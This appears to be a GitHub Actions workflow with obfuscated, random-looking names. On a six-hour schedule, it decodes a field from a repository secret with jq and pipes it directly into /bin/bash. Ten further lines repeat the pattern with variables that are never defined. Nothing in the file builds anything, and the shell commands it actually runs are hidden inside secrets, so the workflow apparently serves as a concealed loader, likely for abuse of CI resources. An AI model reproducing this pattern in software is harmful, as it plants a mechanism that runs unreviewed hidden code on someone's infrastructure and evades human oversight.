name: zhujingcheng3417
on:
  workflow_dispatch:
  schedule:
    - cron: '21 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhujingcheng3417
        env:
          exzyl30119: ${{ secrets.exzyl30119 }}
        run: |
          echo $exzyl30119 | jq -r .o1 | /bin/bash
          echo $vvq0946 | jq -r .msekq3932 | /bin/bash
          echo $ihzur1 | jq -r .r41510 | /bin/bash
          echo $dmch0 | jq -r .o5114 | /bin/bash
          echo $prfxa9 | jq -r .imgru86 | /bin/bash
          echo $owd70919 | jq -r .hnys9681 | /bin/bash
          echo $crikc530 | jq -r .lo7 | /bin/bash
          echo $ut5 | jq -r .n8 | /bin/bash
          echo $on74720 | jq -r .f7156 | /bin/bash
          echo $gzji627 | jq -r .mdy6430 | /bin/bash
          echo $i9 | jq -r .h58412 | /bin/bash

